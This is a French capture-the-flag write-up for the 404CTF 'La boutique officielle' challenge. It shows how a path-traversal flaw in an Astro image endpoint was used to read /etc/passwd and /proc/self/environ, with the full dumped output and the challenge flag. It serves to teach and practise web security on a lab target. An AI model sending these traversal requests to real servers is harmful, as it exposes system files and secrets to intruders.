La boutique officielle

Enoncé

Enfin ! Les billets pour la Cérémonie de Clôture des 404 Travaux du Hacker sont en vente sur la boutique officielle de l’événement. Le prix est peut-être un peu haut, mais tant pis. Vous avez déjà fait l’acquisition de l’une de ces étranges mascottes en forme de… bref ! Tout ça pour dire que ce n’est pas l’argent qui compte : une occasion comme ça, il ne faut pas la louper ! Allez, dépêchez-vous, j’ai le sentiment que vous n’êtes pas le seul à être intéressé

Auteur : Artamis

Résolution

On commence par regardé le site, comme d’habitude

On arrive rapidement sur une file d’attente avec un jeton en base 64 :

v4.public.eyJuYW1lIjoiYSIsInBvc2l0aW9uIjozMjIxLCJlbnF1ZXVlVGltZSI6IjIwMjQtMDUtMDlUMTE6MTk6MDQuNTI3WiIsImlhdCI6IjIwMjQtMDUtMDlUMjM6Mjk6NTQuMjI0WiJ9bxDovy8xny49IHe-bSZ1GoWm2aa29uBehvBjhSpA70B54n5SkOP-wosSZiQJ1blNLbJ-fLSNoJ4bZfACEABZCQ
{"name":"a","position":3221,"enqueueTime":"2024-05-09T11:19:04.527Z","iat":"2024-05-09T23:29:54.224Z"}o/1.= wm&u٦^c*@@y~Rf$     չM-~|e�Y      # La partie base64 décodé

Ca ressemble à un JWT, mais c’est pas un JWT.

En cherchant « token v4.public » dans google, on tombe sur ça : https://github.com/paseto-standard/paseto-spec/blob/master/docs/01-Protocol-Versions/Version4.md

En lisant la documentation, on se dit que ça va pas être facile de l’attaquer, et qu’il faudrait retrouver la clé RSA privée.

Franchement, et après quelques test, ça me semble inattaquable sans la clé.

Donc on va allez voir ailleurs !

Le tag image me semble vraiment étrange :

<img src="/_image?href=%2F_astro%2Fhiking.DKsy_O4r.jpg&amp;w=600&amp;f=webp" alt="Un randonneur en montagne" class="darkmode--ignore w-full rounded-lg" width="600" height="801" loading="lazy" decoding="async">

J’ai rarement vu des images dont la source est un ?href, on va allez voir ça !

Quand on tente la LFI, on obtient une erreur particulière :

https://la-boutique-officielle.challenges.404ctf.fr/_image?href=../../../../../../../../../etc/passwd&w=600&f=webp
Server Error: Error: Input buffer contains unsupported image format

Si on change le format, webp a la fin on obtient ceci : - https://la-boutique-officielle.challenges.404ctf.fr/_image?href=../../../../../../../../../etc/passwd&w=600&f=txt - Server Error: Error: Expected one of: heic, heif, avif, jpeg, jpg, jpe, tile, dz, png, raw, tiff, tif, webp, gif, jp2, jpx, j2k, j2c, jxl for format but received txt of type string

On a beau tenté de nombreux format, rien ne passe, impossible de mettre plusieurs format non plus.

On a tenté de récupérer des images qui pourrait passer comme des fichiers image comme /bin/bash, les clés rsa ou ce genre de chose mais rien n’y fait !

Finalement, un peu par hasard et en parcourant la doc d’Astro : https://docs.astro.build/fr/reference/image-service-reference/

Puis en allant sur d’autres page, on se dit qu’on va tenter d’autre format.

On va donc tester SVG :

https://la-boutique-officielle.challenges.404ctf.fr/_image?href=../../../../../../../../../etc/passwd&w=600&f=txt

This page contains the following errors:
error on line 1 at column 1: Start tag expected, '<' not founderror on line 1 at column 1: Encoding error
Below is a rendering of the page up to the first error.

Oh la on se dit qu’on tient quelque chose !!

Et en regardant le code de la page :

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

Bingo !

On va donc chercher a obtenir d’autre fichier intéressants

https://github.com/DragonJAR/Security-Wordlist/blob/main/LFI-WordList-Linux

On va donc cherher les variables d’environnement, les flags sont souvent la : /proc/self/environ

Et c’est le bingo on obtient le flag !

JAIGLISSECHEF_PORT_4000_TCP_ADDR=10.3.143.41SERVICE_3_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP_PORT=4000SERVICE_3_REVERSIBLE_ENGINEERING_2_SERVICE_HOST=10.3.42.192KUBERNETES_SERVICE_PORT_HTTPS=443COUP_DE_CIRCUIT_C2_PORT_1337_TCP_PROTO=tcpSERVICE_MATCH_DU_SIECLE_BACK_PORT_8000_TCP=tcp://10.3.221.220:8000VAGUE2_LABRASSEOULEPAPILLON_PORT_4000_TCP_ADDR=10.3.157.118SERVICE_MATCH_DU_SIECLE_FRONT_SERVICE_HOST=10.3.118.154SERVICE_1_REVERSIBLE_ENGINEERING_1_PORT_4000_TCP=tcp://10.3.178.174:4000JEPONGEDONCJESSUIE_PORT_4000_TCP=tcp://10.3.229.51:4000SERVICE_1_REVERSIBLE_ENGINEERING_2_PORT=tcp://10.3.122.189:4000KUBERNETES_SERVICE_PORT=443SERVICE_DU_POISON_SERVICE_PORT=80LE_GORFOU_42_SERVICE_PORT_80_TCP_PORT=80SERVICE_CONVSERSATION_CAFE_PORT_80_TCP_ADDR=10.3.131.7RICKROLL_FLAG_NGINX_SERVICE_PORT=80VAGUE2_ZACK_ADEAUX_PORT_4000_TCP_PORT=4000VAGUE2_ZACK_ADEAUX_NODEPORT_SERVICE_PORT=4000SERVICE_PERCEVAL_SERVICE_PORT=80REVERSIBLE_ENGINEERING_0_PORT_9997_TCP=tcp://10.3.13.156:9997JAIGLISSECHEFREVANCHE_SERVICE_PORT=4000RICKROLL_FLAG_NGINX_PORT_80_TCP_PROTO=tcpLE_GORFOU_42_SERVICE_PORT_80_TCP=tcp://10.3.31.79:80SEA_SERVICE_PORT_TCP=4000VAGUE2_LABRASSEOULEPAPILLON_NODEPORT_SERVICE_PORT_TCP=4000SERVICE_DU_POISON_PORT_80_TCP=tcp://10.3.11.141:80HOSTNAME=la-boutique-officielle-7df8b8ff7d-pltnfSEA_PORT=tcp://10.3.19.226:4000JAIGLISSECHEF_PORT_4000_TCP_PORT=4000VAGUE2_ZACK_ADEAUX_NODEPORT_SERVICE_PORT_TCP=4000LE_GORFOU_42_SERVICE_SERVICE_HOST=10.3.31.79SERVICE_2_REVERSIBLE_ENGINEERING_1_PORT=tcp://10.3.201.121:4000SERVICE_3_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP=tcp://10.3.42.192:4000SERVICE_2_REVERSIBLE_ENGINEERING_1_PORT_4000_TCP_ADDR=10.3.201.121VAGUE2_LABRASSEOULEPAPILLON_NODEPORT_PORT_4000_TCP_PORT=4000VAGUE2_ZACK_ADEAUX_NODEPORT_PORT_4000_TCP_ADDR=10.3.23.17REVERSIBLE_ENGINEERING_0_NODEPORT_PORT=tcp://10.3.117.190:9997SERVICE_1_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP_PROTO=tcpJAIGLISSECHEF_PORT_4000_TCP=tcp://10.3.143.41:4000VAGUE2_ZACK_ADEAUX_SERVICE_HOST=10.3.5.166JAIGLISSECHEFREVANCHE_PORT_4000_TCP_PROTO=tcpSALADE_TOMATE_OIGNON_SERVICE_HOST=10.3.122.80JAIGLISSECHEFREVANCHE_SERVICE_PORT_TCP=4000LE_GORFOU_42_SERVICE_PORT_80_TCP_PROTO=tcpSALADE_TOMATE_OIGNON_PORT=tcp://10.3.122.80:4000REVERSIBLE_ENGINEERING_0_SERVICE_PORT_TCP=9997SERVICE_1_REVERSIBLE_ENGINEERING_1_PORT_4000_TCP_PROTO=tcpSERVICE_CONVSERSATION_CAFE_PORT_80_TCP=tcp://10.3.131.7:80SERVICE_DU_POISON_PORT_80_TCP_PORT=80COUP_DE_CIRCUIT_C2_PORT_1337_TCP_PORT=1337SERVICE_2_REVERSIBLE_ENGINEERING_1_PORT_4000_TCP=tcp://10.3.201.121:4000SERVICE_1_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP_ADDR=10.3.122.189SERVICE_CONVSERSATION_CAFE_SERVICE_PORT=80SERVICE_1_REVERSIBLE_ENGINEERING_1_SERVICE_PORT=4000SERVICE_CONVSERSATION_CAFE_SERVICE_PORT_HTTP=80SERVICE_MATCH_DU_SIECLE_FRONT_PORT_3000_TCP_PORT=3000JAIGLISSECHEFREVANCHE_PORT=tcp://10.3.59.166:4000SALADE_TOMATE_OIGNON_PORT_4000_TCP_ADDR=10.3.122.80SALADE_TOMATE_OIGNON_NODEPORT_PORT_4000_TCP_PORT=4000JEPONGEDONCJESSUIE_SERVICE_PORT=4000SERVICE_2_REVERSIBLE_ENGINEERING_1_PORT_4000_TCP_PORT=4000EXPLOIT_MAG_PORT=tcp://10.3.115.8:4321VAGUE2_ZACK_ADEAUX_NODEPORT_PORT_4000_TCP_PORT=4000LA_BOUTIQUE_OFFICIELLE_SERVICE_PORT_HTTP=4321COUP_DE_CIRCUIT_C2_NODEPORT_PORT_1337_TCP_PORT=1337SERVICE_1_REVERSIBLE_ENGINEERING_1_SERVICE_PORT_TCP1=4000PWD=/appEXPLOIT_MAG_PORT_4321_TCP_PORT=4321VAGUE2_LABRASSEOULEPAPILLON_SERVICE_PORT_TCP=4000OS_FLAVOUR=debian-12SALADE_TOMATE_OIGNON_NODEPORT_SERVICE_HOST=10.3.167.183VAGUE2_LABRASSEOULEPAPILLON_NODEPORT_PORT_4000_TCP=tcp://10.3.59.15:4000SERVICE_PERCEVAL_SERVICE_HOST=10.3.170.46VAGUE2_ZACK_ADEAUX_SERVICE_PORT=4000EXPLOIT_MAG_PORT_4321_TCP_ADDR=10.3.115.8PORT=4321JAIGLISSECHEF_SERVICE_HOST=10.3.143.41SERVICE_1_REVERSIBLE_ENGINEERING_2_SERVICE_PORT=4000VAGUE2_LABRASSEOULEPAPILLON_SERVICE_HOST=10.3.157.118VAGUE2_LABRASSEOULEPAPILLON_PORT=tcp://10.3.157.118:4000SEA_PORT_4000_TCP_PORT=4000SERVICE_1_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP_PORT=4000SALADE_TOMATE_OIGNON_PORT_4000_TCP_PROTO=tcpSERVICE_MATCH_DU_SIECLE_FRONT_SERVICE_PORT_HTTP=3000COUP_DE_CIRCUIT_C2_PORT_5000_TCP_PORT=5000COUP_DE_CIRCUIT_C2_NODEPORT_SERVICE_HOST=10.3.85.1JEPONGEDONCJESSUIE_SERVICE_PORT_TCP=4000SALADE_TOMATE_OIGNON_PORT_4000_TCP_PORT=4000SERVICE_2_REVERSIBLE_ENGINEERING_1_SERVICE_HOST=10.3.201.121SERVICE_PERCEVAL_PORT_80_TCP_PORT=80SERVICE_MATCH_DU_SIECLE_BACK_PORT_8000_TCP_PROTO=tcpSERVICE_1_REVERSIBLE_ENGINEERING_1_PORT_4000_TCP_ADDR=10.3.178.174SERVICE_PERCEVAL_PORT_80_TCP_ADDR=10.3.170.46LA_BOUTIQUE_OFFICIELLE_PORT=tcp://10.3.50.155:4321SERVICE_3_REVERSIBLE_ENGINEERING_2_SERVICE_PORT=4000HOME=/nonexistentEN_RETARD_SERVICE_PORT_80_TCP_PROTO=tcpSERVICE_MATCH_DU_SIECLE_FRONT_PORT=tcp://10.3.118.154:3000LE_TABEAU_NOIR_PORT_8080_TCP=tcp://10.3.148.115:8080KUBERNETES_PORT_443_TCP=tcp://10.3.0.1:443REVERSIBLE_ENGINEERING_0_PORT=tcp://10.3.13.156:9997VAGUE2_ZACK_ADEAUX_PORT_4000_TCP_ADDR=10.3.5.166JEPONGEDONCJESSUIE_PORT_4000_TCP_ADDR=10.3.229.51VAGUE2_ZACK_ADEAUX_NODEPORT_SERVICE_HOST=10.3.23.17SERVICE_1_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP=tcp://10.3.122.189:4000SERVICE_1_REVERSIBLE_ENGINEERING_1_PORT_4000_TCP_PORT=4000SERVICE_CONVSERSATION_CAFE_PORT=tcp://10.3.131.7:80SERVICE_DU_POISON_PORT_80_TCP_PROTO=tcpSEA_PORT_4000_TCP_PROTO=tcpJEPONGEDONCJESSUIE_PORT=tcp://10.3.229.51:4000EXPLOIT_MAG_PORT_4321_TCP=tcp://10.3.115.8:4321SALADE_TOMATE_OIGNON_NODEPORT_SERVICE_PORT=4000REVERSIBLE_ENGINEERING_0_NODEPORT_SERVICE_PORT=9997LA_BOUTIQUE_OFFICIELLE_PORT_4321_TCP_ADDR=10.3.50.155LE_GORFOU_42_SERVICE_SERVICE_PORT=80SERVICE_PERCEVAL_PORT_80_TCP=tcp://10.3.170.46:80JAIGLISSECHEF_PORT=tcp://10.3.143.41:4000LE_GORFOU_42_SERVICE_PORT=tcp://10.3.31.79:80RICKROLL_FLAG_NGINX_SERVICE_HOST=10.3.140.203COUP_DE_CIRCUIT_C2_PORT_1337_TCP=tcp://10.3.184.197:1337SERVICE_DU_POISON_SERVICE_PORT_HTTP=80SERVICE_MATCH_DU_SIECLE_FRONT_PORT_3000_TCP_PROTO=tcpSALADE_TOMATE_OIGNON_SERVICE_PORT_TCP=4000JAIGLISSECHEF_PORT_4000_TCP_PROTO=tcpSEA_PORT_4000_TCP_ADDR=10.3.19.226SERVICE_3_REVERSIBLE_ENGINEERING_2_SERVICE_PORT_TCP3=4000VAGUE2_LABRASSEOULEPAPILLON_PORT_4000_TCP_PROTO=tcpSERVICE_DU_POISON_PORT=tcp://10.3.11.141:80VAGUE2_LABRASSEOULEPAPILLON_NODEPORT_PORT_4000_TCP_ADDR=10.3.59.15JAIGLISSECHEFREVANCHE_SERVICE_HOST=10.3.59.166VAGUE2_ZACK_ADEAUX_NODEPORT_PORT_4000_TCP=tcp://10.3.23.17:4000COUP_DE_CIRCUIT_C2_NODEPORT_SERVICE_PORT_C2=1337COUP_DE_CIRCUIT_C2_NODEPORT_PORT_1337_TCP_ADDR=10.3.85.1FLAG=404CTF{Sh0uld_Th1s_B3_a_CVE_?}EN_RETARD_SERVICE_PORT_80_TCP_PORT=80TICKET_PDF_URL=/app/ticket.pdfLE_TABEAU_NOIR_SERVICE_PORT_HTTP=8080SERVICE_MATCH_DU_SIECLE_FRONT_SERVICE_PORT=3000LA_BOUTIQUE_OFFICIELLE_PORT_4321_TCP_PORT=4321EN_RETARD_SERVICE_PORT_80_TCP_ADDR=10.3.68.230VAGUE2_LABRASSEOULEPAPILLON_NODEPORT_PORT=tcp://10.3.59.15:4000JAIGLISSECHEFREVANCHE_PORT_4000_TCP=tcp://10.3.59.166:4000VAGUE2_ZACK_ADEAUX_PORT=tcp://10.3.5.166:4000EXPLOIT_MAG_SERVICE_PORT_HTTP=4321SERVICE_2_REVERSIBLE_ENGINEERING_1_PORT_4000_TCP_PROTO=tcpVAGUE2_ZACK_ADEAUX_NODEPORT_PORT=tcp://10.3.23.17:4000COUP_DE_CIRCUIT_C2_PORT_1337_TCP_ADDR=10.3.184.197LA_BOUTIQUE_OFFICIELLE_PORT_4321_TCP=tcp://10.3.50.155:4321REVERSIBLE_ENGINEERING_0_NODEPORT_PORT_9997_TCP=tcp://10.3.117.190:9997REVERSIBLE_ENGINEERING_0_PORT_9997_TCP_PROTO=tcpREVERSIBLE_ENGINEERING_0_SERVICE_HOST=10.3.13.156VAGUE2_LABRASSEOULEPAPILLON_PORT_4000_TCP_PORT=4000COUP_DE_CIRCUIT_C2_NODEPORT_PORT=tcp://10.3.85.1:1337EN_RETARD_SERVICE_SERVICE_PORT=80EN_RETARD_SERVICE_PORT=tcp://10.3.68.230:80EXPLOIT_MAG_PORT_4321_TCP_PROTO=tcpJEPONGEDONCJESSUIE_PORT_4000_TCP_PORT=4000COUP_DE_CIRCUIT_C2_PORT_5000_TCP_ADDR=10.3.184.197SERVICE_2_REVERSIBLE_ENGINEERING_2_SERVICE_HOST=10.3.229.47SERVICE_CONVSERSATION_CAFE_SERVICE_HOST=10.3.131.7HOST=0.0.0.0VAGUE2_ZACK_ADEAUX_PORT_4000_TCP_PROTO=tcpSERVICE_MATCH_DU_SIECLE_BACK_PORT_8000_TCP_ADDR=10.3.221.220LE_TABEAU_NOIR_PORT=tcp://10.3.148.115:8080SEA_SERVICE_PORT=4000SERVICE_CONVSERSATION_CAFE_PORT_80_TCP_PORT=80SERVICE_2_REVERSIBLE_ENGINEERING_1_SERVICE_PORT_TCP2=4000SERVICE_DU_POISON_PORT_80_TCP_ADDR=10.3.11.141LA_BOUTIQUE_OFFICIELLE_PORT_4321_TCP_PROTO=tcpVAGUE2_LABRASSEOULEPAPILLON_NODEPORT_SERVICE_HOST=10.3.59.15SERVICE_1_REVERSIBLE_ENGINEERING_1_SERVICE_HOST=10.3.178.174VAGUE2_ZACK_ADEAUX_SERVICE_PORT_TCP=4000VAGUE2_LABRASSEOULEPAPILLON_SERVICE_PORT=4000SHLVL=0LA_BOUTIQUE_OFFICIELLE_SERVICE_HOST=10.3.50.155SALADE_TOMATE_OIGNON_NODEPORT_SERVICE_PORT_TCP=4000COUP_DE_CIRCUIT_C2_PORT_5000_TCP=tcp://10.3.184.197:5000COUP_DE_CIRCUIT_C2_SERVICE_PORT_C2=1337REVERSIBLE_ENGINEERING_0_PORT_9997_TCP_PORT=9997LE_TABEAU_NOIR_SERVICE_HOST=10.3.148.115SERVICE_3_REVERSIBLE_ENGINEERING_2_PORT=tcp://10.3.42.192:4000KUBERNETES_PORT_443_TCP_PROTO=tcpCOUP_DE_CIRCUIT_C2_NODEPORT_PORT_1337_TCP=tcp://10.3.85.1:1337SERVICE_2_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP_PORT=4000SERVICE_MATCH_DU_SIECLE_BACK_PORT_8000_TCP_PORT=8000SALADE_TOMATE_OIGNON_NODEPORT_PORT_4000_TCP_PROTO=tcpREVERSIBLE_ENGINEERING_0_SERVICE_PORT=9997LA_BOUTIQUE_OFFICIELLE_SERVICE_PORT=4321BITNAMI_APP_NAME=nodeREVERSIBLE_ENGINEERING_0_PORT_9997_TCP_ADDR=10.3.13.156RICKROLL_FLAG_NGINX_PORT_80_TCP_PORT=80COUP_DE_CIRCUIT_C2_SERVICE_PORT=5000SERVICE_MATCH_DU_SIECLE_BACK_SERVICE_PORT_HTTP=8000KUBERNETES_PORT_443_TCP_ADDR=10.3.0.1SERVICE_PERCEVAL_SERVICE_PORT_HTTP=80EN_RETARD_SERVICE_SERVICE_HOST=10.3.68.230EXPLOIT_MAG_SERVICE_PORT=4321APP_VERSION=20.12.2SERVICE_3_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP_PROTO=tcpSERVICE_2_REVERSIBLE_ENGINEERING_1_SERVICE_PORT=4000EN_RETARD_SERVICE_PORT_80_TCP=tcp://10.3.68.230:80LE_GORFOU_42_SERVICE_SERVICE_PORT_HTTP=80LE_TABEAU_NOIR_PORT_8080_TCP_PORT=8080SERVICE_3_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP_ADDR=10.3.42.192SALADE_TOMATE_OIGNON_NODEPORT_PORT=tcp://10.3.167.183:4000COUP_DE_CIRCUIT_C2_NODEPORT_SERVICE_PORT=1337JEPONGEDONCJESSUIE_PORT_4000_TCP_PROTO=tcpCOUP_DE_CIRCUIT_C2_SERVICE_HOST=10.3.184.197JAIGLISSECHEFREVANCHE_PORT_4000_TCP_ADDR=10.3.59.166KUBERNETES_SERVICE_HOST=10.3.0.1RICKROLL_FLAG_NGINX_PORT_80_TCP=tcp://10.3.140.203:80SEA_SERVICE_HOST=10.3.19.226VAGUE2_ZACK_ADEAUX_NODEPORT_PORT_4000_TCP_PROTO=tcpSERVICE_PERCEVAL_PORT_80_TCP_PROTO=tcpEXPLOIT_MAG_SERVICE_HOST=10.3.115.8KUBERNETES_PORT=tcp://10.3.0.1:443JEPONGEDONCJESSUIE_SERVICE_HOST=10.3.229.51KUBERNETES_PORT_443_TCP_PORT=443SALADE_TOMATE_OIGNON_NODEPORT_PORT_4000_TCP_ADDR=10.3.167.183SERVICE_2_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP_ADDR=10.3.229.47SALADE_TOMATE_OIGNON_SERVICE_PORT=4000LE_TABEAU_NOIR_SERVICE_PORT=8080COUP_DE_CIRCUIT_C2_SERVICE_PORT_HTTP=5000REVERSIBLE_ENGINEERING_0_NODEPORT_SERVICE_PORT_TCP=9997REVERSIBLE_ENGINEERING_0_NODEPORT_PORT_9997_TCP_PORT=9997REVERSIBLE_ENGINEERING_0_NODEPORT_SERVICE_HOST=10.3.117.190OS_NAME=linuxSEA_PORT_4000_TCP=tcp://10.3.19.226:4000RICKROLL_FLAG_NGINX_PORT_80_TCP_ADDR=10.3.140.203PATH=/opt/bitnami/python/bin:/opt/bitnami/node/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binSERVICE_MATCH_DU_SIECLE_FRONT_PORT_3000_TCP_ADDR=10.3.118.154VAGUE2_LABRASSEOULEPAPILLON_NODEPORT_PORT_4000_TCP_PROTO=tcpRICKROLL_FLAG_NGINX_PORT=tcp://10.3.140.203:80SERVICE_2_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP_PROTO=tcpREVERSIBLE_ENGINEERING_0_NODEPORT_PORT_9997_TCP_ADDR=10.3.117.190VAGUE2_LABRASSEOULEPAPILLON_NODEPORT_SERVICE_PORT=4000SALADE_TOMATE_OIGNON_PORT_4000_TCP=tcp://10.3.122.80:4000SERVICE_2_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP=tcp://10.3.229.47:4000SERVICE_MATCH_DU_SIECLE_BACK_SERVICE_HOST=10.3.221.220SERVICE_DU_POISON_SERVICE_HOST=10.3.11.141SERVICE_MATCH_DU_SIECLE_BACK_SERVICE_PORT=8000REVERSIBLE_ENGINEERING_0_NODEPORT_PORT_9997_TCP_PROTO=tcpCOUP_DE_CIRCUIT_C2_PORT_5000_TCP_PROTO=tcpSERVICE_MATCH_DU_SIECLE_BACK_PORT=tcp://10.3.221.220:8000SERVICE_2_REVERSIBLE_ENGINEERING_2_SERVICE_PORT_TCP2=4000COUP_DE_CIRCUIT_C2_NODEPORT_PORT_1337_TCP_PROTO=tcpVAGUE2_ZACK_ADEAUX_PORT_4000_TCP=tcp://10.3.5.166:4000SERVICE_CONVSERSATION_CAFE_PORT_80_TCP_PROTO=tcpVAGUE2_LABRASSEOULEPAPILLON_PORT_4000_TCP=tcp://10.3.157.118:4000JAIGLISSECHEF_SERVICE_PORT=4000JAIGLISSECHEFREVANCHE_PORT_4000_TCP_PORT=4000LE_TABEAU_NOIR_PORT_8080_TCP_PROTO=tcpLE_GORFOU_42_SERVICE_PORT_80_TCP_ADDR=10.3.31.79SERVICE_2_REVERSIBLE_ENGINEERING_2_SERVICE_PORT=4000EN_RETARD_SERVICE_SERVICE_PORT_HTTP=80SERVICE_1_REVERSIBLE_ENGINEERING_2_SERVICE_PORT_TCP1=4000SERVICE_2_REVERSIBLE_ENGINEERING_2_PORT=tcp://10.3.229.47:4000SERVICE_PERCEVAL_PORT=tcp://10.3.170.46:80SERVICE_1_REVERSIBLE_ENGINEERING_1_PORT=tcp://10.3.178.174:4000SERVICE_1_REVERSIBLE_ENGINEERING_2_SERVICE_HOST=10.3.122.189JAIGLISSECHEF_SERVICE_PORT_TCP=4000SERVICE_MATCH_DU_SIECLE_FRONT_PORT_3000_TCP=tcp://10.3.118.154:3000OS_ARCH=amd64COUP_DE_CIRCUIT_C2_PORT=tcp://10.3.184.197:5000RICKROLL_FLAG_NGINX_SERVICE_PORT_HTTP=80SALADE_TOMATE_OIGNON_NODEPORT_PORT_4000_TCP=tcp://10.3.167.183:4000LE_TABEAU_NOIR_PORT_8080_TCP_ADDR=10.3.148.115_=/opt/bitnami/node/bin/node

Et la dedans on retrouve notre flag : 404CTF{Sh0uld_Th1s_B3_a_CVE_?}

Et on finira notamment TOP 5 sur la validation de ce chall !